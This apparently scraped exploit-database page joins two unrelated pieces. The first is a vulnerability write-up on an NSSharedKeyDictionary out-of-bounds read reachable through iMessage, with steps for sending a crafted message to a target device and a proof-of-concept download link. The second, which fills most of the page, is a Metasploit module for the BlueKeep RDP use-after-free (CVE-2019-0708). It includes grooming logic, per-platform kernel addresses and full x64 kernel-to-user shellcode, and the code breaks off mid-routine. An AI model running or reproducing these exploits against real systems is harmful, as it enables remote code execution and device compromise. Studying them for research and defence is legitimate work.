ISHACK AI BOT

When an NSKeyedUnarchiver decodes an object, it first allocates the object using allocWithZone, and then puts the object into a dictionary for temporary objects. It then calls the appropriate initWithCoder: on the allocated object. If initWithCoder: or any method it calls decodes the same object, its gets back a reference to the original object in the temporary object dictionary. For many classes, this is a placeholder object that will throw an "uninitialized" exception when accessed, but for some classes, this is the object that will eventually be returned by initWithCoder:. This means that when an initWithCoder: method decodes an object that has a reference to itself in it, the object might not be fully initialized. The NSSharedKeyDictionary class is a subclass of NSDictionary that allows for a dictionary to be greatly optimized if the keys it uses are declared up front. The keys are specified in an instance of class NSSharedKeySet. This instance can have a child keyset, and the child keyset can also have a child keyset and so on. This allows for multiple keysets to be used by a single dictionary. When a dictionary is initialized, it adds the length of its keyset as well as child keysets at each level, and initializes a value array of that length. Values are then stored and accessed by calculating a key's index based on its position in it keyset, and accessing that location in the value array. It is possible to combine these two behaviors to create an NSSharedKeyDictionary with a value array that is too small. When an NS NSSharedKeyDictionary is decoded, it will start by decoding the NSSharedKeySet for that dictionary. That keyset, can in turn decode another dictionary as one of its keys. If the second dictionary decodes the same keyset as its keyset, it will get back a reference to the keyset that is in the process of being initialized. That keyset could have a child keyset, but the child keyset has not been decoded at this stage in initializtion. This leads to the second dictionary calculating the length of its value array based on keyset not having a child keyset, even though it could have one. This means that if a key in the child keyset of this array is accessed in this dictionary, the value returned will be read from unallocated memory on the heap (this memory could also be written if a key in the child keyset is set, but it unusual for decoded dictionaries to be written to). To reproduce this issue in iMessage: 1) install frida (pip3 install frida) 2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device 3) in injectMessage.js replace the marker "PATH" with the path of the obj file 4) in the local directory, run: python3 sendMessage.py This PoC does not crash very reliably in Springboard, though I think this issue is likely exploitable. To make reproducing this issue easier, I've attached a test program for Mac that reproduces the decoding issue. To reproduce the issue using this program: 1) Build the program: clang decodeshared.m -o decodeshared -fobjc-arc -framework Corespotlight 2) Run the program with libgmalloc and the attached obj file: DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./decodeshared obj This will lead to a consistent crash where the out-of-bounds read occurs. A log of this issue crashing in Springboard is attached. The NSSharedDictionary initWithCoder implementation is very complex and greatly increases the attack surface of decoding the NSDictionary class. Moreover, it has functional problems that suggest that it is not widely used, and NSSharedDictionary instances can be correctly encoded and decoded with the NSDictionary initWithCoder. I recommend that this issue be resolved by removing custom encoding for the NSSharedDictionary class. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47415.zip

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Exploitation and Caveats from zerosum0x0: # # 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally. # 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py) # 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120. # 4. RDP has chunked messages, so we use this to groom. # a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120. # b. However, on 7+, MS_T120 will not work and you have to use RDPSND. # i. RDPSND only works when # HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0 # ii. This registry key is not a default setting for server 2008 R2. # We should use alternate groom channels or at least detect the # channel in advance. # 5. Use chunked grooming to fit new data in the freed channel, account for # the allocation header size (like 0x38 I think?). At offset 0x100? is where # the "call [rax]" gadget will get its pointer from. # a. The NonPagedPool (NPP) starts at a fixed address on XP-7 # i. Hot-swap memory is another problem because, with certain VMWare and # Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP # start. This can be anywhere from 100 mb to gigabytes of offset # before the NPP start. # b. Set offset 0x100 to NPPStart+SizeOfGroomInMB # c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need # [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an # indirect call # d. We are limited to 0x400 payloads by channel chunk max size. My # current shellcode is a twin shellcode with eggfinders. I spam the # kernel payload and user payload, and if user payload is called first it # will egghunt for the kernel payload. # 6. After channel hole is filled and the NPP is spammed up with shellcode, # trigger the free by closing the socket. # # TODO: # * Detect OS specifics / obtain memory leak to determine NPP start address. # * Write the XP/2003 portions grooming MS_T120. # * Detect if RDPSND grooming is working or not? # * Expand channels besides RDPSND/MS_T120 for grooming. # See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/ # # https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming # MS_T120 on XP... should be same process as the RDPSND class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking USERMODE_EGG = 0xb00dac0fefe31337 KERNELMODE_EGG = 0xb00dac0fefe42069 CHUNK_SIZE = 0x400 HEADER_SIZE = 0x48 include Msf::Exploit::Remote::RDP include Msf::Exploit::Remote::CheckScanner def initialize(info = {}) super(update_info(info, 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free', 'Description' => %q( The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. ), 'Author' => [ 'Sean Dillon <[email protected]>', # @zerosum0x0 - Original exploit 'Ryan Hanson', # @ryHanson - Original exploit 'OJ Reeves <[email protected]>', # @TheColonial - Metasploit module 'Brent Cook <[email protected]>', # @busterbcook - Assembly whisperer ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-0708'], ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 5, 'RDP_CLIENT_NAME' => 'ethdev', 'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep' }, 'Privileged' => true, 'Payload' => { 'Space' => CHUNK_SIZE - HEADER_SIZE, 'EncoderType' => Msf::Encoder::Type::Raw, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic targeting via fingerprinting', { 'Arch' => [ARCH_X64], 'FingerprintOnly' => true }, ], # # # Windows 2008 R2 requires the following registry change from default: # # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd] # "fDisableCam"=dword:00000000 # [ 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8003800000, 'GROOMSIZE' => 100 } ], [ # This works with Virtualbox 6 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8002407000 } ], [ # This address works on VMWare 14 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8030c00000 } ], [ # This address works on VMWare 15 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8018C00000 } ], [ # This address works on VMWare 15.1 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8018c08000 } ], [ 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8102407000 } ], [ 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'GROOMBASE' => 0xfffffa8018c08000 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 14 2019', 'Notes' => { 'AKA' => ['Bluekeep'] } )) register_advanced_options( [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]), OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]), OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]), ] ) end def exploit unless check == CheckCode::Vulnerable || datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') end if target['FingerprintOnly'] fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually') end begin rdp_connect rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') end is_rdp, server_selected_proto = rdp_check_protocol unless is_rdp fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') end # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us # from exploiting the target. if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto) fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.') end chans = [ ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP], [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], ] @mst120_chan_id = 1004 + chans.length - 1 unless rdp_negotiate_security(chans, server_selected_proto) fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.') end rdp_establish_session rdp_dispatch_loop end private # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is # received on a channel, and this is when we need to kick off our exploit. def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data) # We have to do the default behaviour first. super(pkt, user, chan_id, flags, data) groom_size = datastore['GROOMSIZE'] pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size) groom_chan_count = datastore['GROOMCHANNELCOUNT'] payloads = create_payloads(pool_addr) print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.") target_channel_id = chan_id + 1 spray_buffer = create_exploit_channel_buffer(pool_addr) spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF) free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80 print_status("Surfing channels ...") rdp_send(spray_channel * 1024) rdp_send(free_trigger) chan_surf_size = 0x421 spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min chan_surf_packet = spray_channel * spray_packets chan_surf_count = chan_surf_size / spray_packets chan_surf_count.times do rdp_send(chan_surf_packet) end print_status("Lobbing eggs ...") groom_mb = groom_size * 1024 / payloads.length groom_mb.times do tpkts = '' for c in 0..groom_chan_count payloads.each do |p| tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF) end end rdp_send(tpkts) end # Terminating and disconnecting forces the USE print_status("Forcing the USE of FREE'd object ...") rdp_terminate rdp_disconnect end # Helper function to create the kernel mode payload and the usermode payload with # the egg hunter prefix. def create_payloads(pool_address) begin [kernel_mode_payload, user_mode_payload].map { |p| [ pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg p ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00") } rescue => ex print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})") end end def assemble_with_fixups(asm) # Rewrite all instructions of form 'lea reg, [rel label]' as relative # offsets for the instruction pointer, since metasm's 'ModRM' parser does # not grok that syntax. lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/ asm.gsub!(lea_rel) do |match| match = "lea #{$1}, [rip + #{$2}]" end # metasm encodes all rep instructions as repnz # https://github.com/jjyg/metasm/pull/40 asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4') encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded # Fixup above rewritten instructions with the relative label offsets encoded.reloc.each do |offset, reloc| target = reloc.target.to_s if encoded.export.key?(target) # Note: this assumes the address we're fixing up is at the end of the # instruction. This holds for 'lea' but if there are other fixups # later, this might need to change to account for specific instruction # encodings if reloc.type == :i32 instr_offset = offset + 4 elsif reloc.type == :i16 instr_offset = offset + 2 end encoded.fixup(target => encoded.export[target] - instr_offset) else raise "Unknown symbol '#{target}' while resolving relative offsets" end end encoded.fill encoded.data end # The user mode payload has two parts. The first is an egg hunter that searches for # the kernel mode payload. The second part is the actual payload that's invoked in # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel # and user mode payloads around the heap in different packets because we don't have # enough space to put them both in the same chunk. Given that code exec can result in # landing on the user land payload, the egg is used to go to a kernel payload. def user_mode_payload asm = %Q^ _start: lea rcx, [rel _start] mov r8, 0x#{KERNELMODE_EGG.to_s(16)} _egg_loop: sub rcx, 0x#{CHUNK_SIZE.to_s(16)} sub rax, 0x#{CHUNK_SIZE.to_s(16)} mov rdx, [rcx - 8] cmp rdx, r8 jnz _egg_loop jmp rcx ^ egg_loop = assemble_with_fixups(asm) # The USERMODE_EGG is required at the start as well, because the exploit code # assumes the tag is there, and jumps over it to find the shellcode. [ USERMODE_EGG, egg_loop, USERMODE_EGG, payload.raw ].pack('<Qa*<Qa*') end def kernel_mode_payload # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya # # This shellcode was written originally for eternalblue exploits # eternalblue_exploit7.py and eternalblue_exploit8.py # # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0) # # Note: # - The userland shellcode is run in a new thread of system process. # If userland shellcode causes any exception, the system process get killed. # - On idle target with multiple core processors, the hijacked system call # might take a while (> 5 minutes) to get called because the system # call may be called on other processors. # - The shellcode does not allocate shadow stack if possible for minimal shellcode size. # This is ok because some Windows functions do not require a shadow stack. # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed. # Note: the Windows 8 version macros are removed below # - The userland payload MUST be appened to this shellcode. # # References: # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info) # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c data_kapc_offset = 0x10 data_nt_kernel_addr_offset = 0x8 data_origin_syscall_offset = 0 data_peb_addr_offset = -0x10 data_queueing_kapc_offset = -0x8 hal_heap_storage = 0xffffffffffd04100 # These hashes are not the same as the ones used by the # Block API so they have to be hard-coded. createthread_hash = 0x835e515e keinitializeapc_hash = 0x6d195cc4 keinsertqueueapc_hash = 0xafcc4634 psgetcurrentprocess_hash = 0xdbf47c78 psgetprocessid_hash = 0x170114e1 psgetprocessimagefilename_hash = 0x77645f3f psgetprocesspeb_hash = 0xb818b848 psgetthreadteb_hash = 0xcef84c3e spoolsv_exe_hash = 0x3ee083d8 zwallocatevirtualmemory_hash = 0x576e99ea asm = %Q^ shellcode_start: nop nop nop nop ; IRQL is DISPATCH_LEVEL when got code execution push rbp call set_rbp_data_address_fn ; read current syscall mov ecx, 0xc0000082 rdmsr ; do NOT replace saved original syscall address with hook syscall lea r9, [rel syscall_hook] cmp eax, r9d je _setup_syscall_hook_done ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize cmp dword [rbp+#{data_origin_syscall_offset}], eax je _hook_syscall ; save original syscall mov dword [rbp+#{data_origin_syscall_offset}+4], edx mov dword [rbp+#{data_origin_syscall_offset}], eax ; first time on the target mov byte [rbp+#{data_queueing_kapc_offset}], 0 _hook_syscall: ; set a new syscall on running processor ; setting MSR 0xc0000082 affects only running processor xchg r9, rax push rax pop rdx ; mov rdx, rax shr rdx, 32 wrmsr _setup_syscall_hook_done: pop rbp ;--------------------- HACK crappy thread cleanup -------------------- ; This code is effectively the same as the epilogue of the function that calls ; the vulnerable function in the kernel, with a tweak or two. ; TODO: make the lock not suck!! mov rax, qword [gs:0x188] add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++ lea r11, [rsp+0b8h] xor eax, eax mov rbx, [r11+30h] mov rbp, [r11+40h] mov rsi, [r11+48h] mov rsp, r11 pop r15 pop r14 pop r13 pop r12 pop rdi ret ;--------------------- END HACK crappy thread cleanup ;======================================================================== ; Find memory address in HAL heap for using as data area ; Return: rbp = data address ;======================================================================== set_rbp_data_address_fn: ; On idle target without user application, syscall on hijacked processor might not be called immediately. ; Find some address to store the data, the data in this address MUST not be modified ; when exploit is rerun before syscall is called ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000] ; ------ HACK rbp wasnt valid! mov rbp, #{hal_heap_storage} ; TODO: use some other buffer besides HAL heap?? ; --------- HACK end rbp _set_rbp_data_address_fn_next: ;shr rbp, 12 ;shl rbp, 12 ;sub rbp, 0x70 ; for KAPC struct too ret ;int 3 ;call $+5 ;pop r13 syscall_hook: swapgs mov qword [gs:0x10], rsp mov rsp, qword [gs:0x1a8] push 0x2b push qword [gs:0x10] push rax ; want this stack space to store original syscall addr ; save rax first to make this function continue to real syscall push rax push rbp ; save rbp here because rbp is special register for accessing this shellcode data call set_rbp_data_address_fn mov rax, [rbp+#{data_origin_syscall_offset}] add rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler mov [rsp+0x10], rax ; save all volatile registers push rcx push rdx push r8 push r9 push r10 push r11 ; use lock cmpxchg for queueing APC only one at a time xor eax, eax mov dl, 1 lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl jnz _syscall_hook_done ;====================================== ; restore syscall ;====================================== ; an error after restoring syscall should never occur mov ecx, 0xc0000082 mov eax, [rbp+#{data_origin_syscall_offset}] mov edx, [rbp+#{data_origin_syscall_offset}+4] wrmsr ; allow interrupts while executing shellcode sti call r3_to_r0_start cli _syscall_hook_done: pop r11 pop r10 pop r9 pop r8 pop rdx pop rcx pop rbp pop rax ret r3_to_r0_start: ; save used non-volatile registers push r15 push r14 push rdi push rsi push rbx push rax ; align stack by 0x10 ;====================================== ; find nt kernel address ;====================================== mov r15, qword [rbp+#{data_origin_syscall_offset}] ; KiSystemCall64 is an address in nt kernel shr r15, 0xc ; strip to page size shl r15, 0xc _x64_find_nt_walk_page: sub r15, 0x1000 ; walk along page size cmp word [r15], 0x5a4d ; 'MZ' header jne _x64_find_nt_walk_page ; save nt address for using in KernelApcRoutine mov [rbp+#{data_nt_kernel_addr_offset}], r15 ;====================================== ; get current EPROCESS and ETHREAD ;====================================== mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR mov edi, #{psgetcurrentprocess_hash} call win_api_direct xchg rcx, rax ; rcx = EPROCESS ; r15 : nt kernel address ; r14 : ETHREAD ; rcx : EPROCESS ;====================================== ; find offset of EPROCESS.ImageFilename ;====================================== mov edi, #{psgetprocessimagefilename_hash} call get_proc_addr mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f) mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename ;====================================== ; find offset of EPROCESS.ThreadListHead ;====================================== ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+) ; if offset of ImageFilename is more than 0x400, current is (Win8+) cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename jb _find_eprocess_threadlist_offset_win7 add eax, 0x10 _find_eprocess_threadlist_offset_win7: lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead ;====================================== ; find offset of ETHREAD.ThreadListEntry ;====================================== lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead mov r9, r8 ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700 _find_ethread_threadlist_offset_loop: mov r9, qword [r9] cmp r8, r9 ; check end of list je _insert_queue_apc_done ; not found !!! ; if (r9 - r14 < 0x700) found mov rax, r9 sub rax, r14 cmp rax, 0x700 ja _find_ethread_threadlist_offset_loop sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry) ;====================================== ; find offset of EPROCESS.ActiveProcessLinks ;====================================== mov edi, #{psgetprocessid_hash} call get_proc_addr mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f) add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId) ;====================================== ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock ;====================================== ; check process name xor eax, eax ; HACK to exit earlier if process not found _find_target_process_loop: lea rsi, [rcx+rbx] push rax call calc_hash cmp eax, #{spoolsv_exe_hash} ; "spoolsv.exe" pop rax jz found_target_process ;---------- HACK PROCESS NOT FOUND start ----------- inc rax cmp rax, 0x300 ; HACK not found! jne _next_find_target_process xor ecx, ecx ; clear queueing kapc flag, allow other hijacked system call to run shellcode mov byte [rbp+#{data_queueing_kapc_offset}], cl jmp _r3_to_r0_done ;---------- HACK PROCESS NOT FOUND end ----------- _next_find_target_process: ; next process mov rcx, [rcx+rdi] sub rcx, rdi jmp _find_target_process_loop found_target_process: ; The allocation for userland payload will be in KernelApcRoutine. ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess() ;====================================== ; save process PEB for finding CreateThread address in kernel KAPC routine ;====================================== mov edi, #{psgetprocesspeb_hash} ; rcx is EPROCESS. no need to set it. call win_api_direct mov [rbp+#{data_peb_addr_offset}], rax ;====================================== ; iterate ThreadList until KeInsertQueueApc() success ;====================================== ; r15 = nt ; r14 = -(offset of ETHREAD.ThreadListEntry) ; rcx = EPROCESS ; edx = offset of EPROCESS.ThreadListHead lea rsi, [rcx + rdx] ; rsi = ThreadListHead address mov rbx, rsi ; use rbx for iterating thread ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset. ; Moreover, alertable thread need to be waiting state which is more difficult to check. ; try queueing APC then check KAPC member is more reliable. _insert_queue_apc_loop: ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front mov rbx, [rbx+8] cmp rsi, rbx je _insert_queue_apc_loop ; skip list head ; find start of ETHREAD address ; set it to rdx to be used for KeInitializeApc() argument too lea rdx, [rbx + r14] ; ETHREAD ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer. ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL. ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer. ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL. ; Teb member is next to Queue member. mov edi, #{psgetthreadteb_hash} call get_proc_addr mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f) cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL je _insert_queue_apc_loop ; KeInitializeApc(PKAPC, ; PKTHREAD, ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0), ; PKKERNEL_ROUTINE = kernel_apc_routine, ; PKRUNDOWN_ROUTINE = NULL, ; PKNORMAL_ROUTINE = userland_shellcode, ; KPROCESSOR_MODE = UserMode (1), ; PVOID Context); lea rcx, [rbp+#{data_kapc_offset}] ; PAKC xor r8, r8 ; OriginalApcEnvironment lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine push rbp ; context push 1 ; UserMode push rbp ; userland shellcode (MUST NOT be NULL) push r8 ; NULL sub rsp, 0x20 ; shadow stack mov edi, #{keinitializeapc_hash} call win_api_direct ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0); ; SystemArgument1 is second argument in usermode code (rdx) ; SystemArgument2 is third argument in usermode code (r8) lea rcx, [rbp+#{data_kapc_offset}] ;xor edx, edx ; no need to set it here ;xor r8, r8 ; no need to set it here xor r9, r9 mov edi, #{keinsertqueueapc_hash} call win_api_direct add rsp, 0x40 ; if insertion failed, try next thread test eax, eax jz _insert_queue_apc_loop mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry ; EPROCESS pointer 8 bytes ; InProgressFlags 1 byte ; KernelApcPending 1 byte ; if success, UserApcPending MUST be 1 cmp byte [rax+0x1a], 1 je _insert_queue_apc_done ; manual remove list without lock mov [rax], rax mov [rax+8], rax jmp _insert_queue_apc_loop _insert_queue_apc_done: ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine. _r3_to_r0_done: pop rax pop rbx pop rsi pop rdi pop r14 pop r15 ret ;======================================================================== ; Call function in specific module ; ; All function arguments are passed as calling normal function with extra register arguments ; Extra Arguments: r15 = module pointer ; edi = hash of target function name ;======================================================================== win_api_direct: call get_proc_addr jmp rax ;======================================================================== ; Get function address in specific module ; ; Arguments: r15 = module pointer ; edi = hash of target function name ; Return: eax = offset ;======================================================================== get_proc_addr: ; Save registers push rbx push rcx push rsi ; for using calc_hash ; use rax to find EAT mov eax, dword [r15+60] ; Get PE header e_lfanew mov eax, dword [r15+rax+136] ; Get export tables RVA add rax, r15 push rax ; save EAT mov ecx, dword [rax+24] ; NumberOfFunctions mov ebx, dword [rax+32] ; FunctionNames add rbx, r15 _get_proc_addr_get_next_func: ; When we reach the start of the EAT (we search backwards), we hang or crash dec ecx ; decrement NumberOfFunctions mov esi, dword [rbx+rcx*4] ; Get rva of next module name add rsi, r15 ; Add the modules base address call calc_hash cmp eax, edi ; Compare the hashes jnz _get_proc_addr_get_next_func ; try the next function _get_proc_addr_finish: pop rax ; restore EAT mov ebx, dword [rax+36] add rbx, r15 ; ordinate table virtual address mov cx, word [rbx+rcx*2] ; desired functions ordinal mov ebx, dword [rax+28] ; Get the function addresses table rva add rbx, r15 ; Add the modules base address mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA add rax, r15 ; Add the modules base address to get the functions actual VA pop rsi pop rcx pop rbx ret ;======================================================================== ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode. ; ; Argument: rsi = string to hash ; Clobber: rsi ; Return: eax = hash ;======================================================================== calc_hash: push rdx xor eax, eax cdq _calc_hash_loop: lodsb ; Read in the next byte of the ASCII string ror edx, 13 ; Rotate right our hash value add edx, eax ; Add the next byte of the string test eax, eax ; Stop when found NULL jne _calc_hash_loop xchg edx, eax pop rdx ret ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context. ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery(). ; Moreover, there is no lock when calling KernelApcRoutine. ; So KernelApcRoutine can simply lower the IRQL by setting cr8 register. ; ; VOID KernelApcRoutine( ; IN PKAPC Apc, ; IN PKNORMAL_ROUTINE *NormalRoutine, ; IN PVOID *NormalContext, ; IN PVOID *SystemArgument1, ; IN PVOID *SystemArgument2) kernel_kapc_routine: push rbp push rbx push rdi push rsi push r15 mov rbp, [r8] ; *NormalContext is our data area pointer mov r15, [rbp+#{data_nt_kernel_addr_offset}] push rdx pop rsi ; mov rsi, rdx mov rbx, r9 ;====================================== ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40) ;====================================== xor eax, eax mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires) ; rdx is already address of baseAddr mov [rdx], rax ; baseAddr = 0 mov ecx, eax not rcx ; ProcessHandle = -1 mov r8, rax ; ZeroBits mov al, 0x40 ; eax = 0x40 push rax ; PAGE_EXECUTE_READWRITE = 0x40 shl eax, 6 ; eax = 0x40 << 6 = 0x1000 push rax ; MEM_COMMIT = 0x1000 ; reuse r9 for address of RegionSize mov [r9], rax ; RegionSize = 0x1000 sub rsp, 0x20 ; shadow stack mov edi, #{zwallocatevirtualmemory_hash} call win_api_direct add rsp, 0x30 ; check error test eax, eax jnz _kernel_kapc_routine_exit ;====================================== ; copy userland payload ;====================================== mov rdi, [rsi] ;--------------------------- HACK IN EGG USER --------- push rdi lea rsi, [rel shellcode_start] mov rdi, 0x#{USERMODE_EGG.to_s(16)} _find_user_egg_loop: sub rsi, 0x#{CHUNK_SIZE.to_s(16)} mov rax, [rsi - 8] cmp rax, rdi jnz _find_user_egg_loop _inner_find_user_egg_loop: inc rsi mov rax, 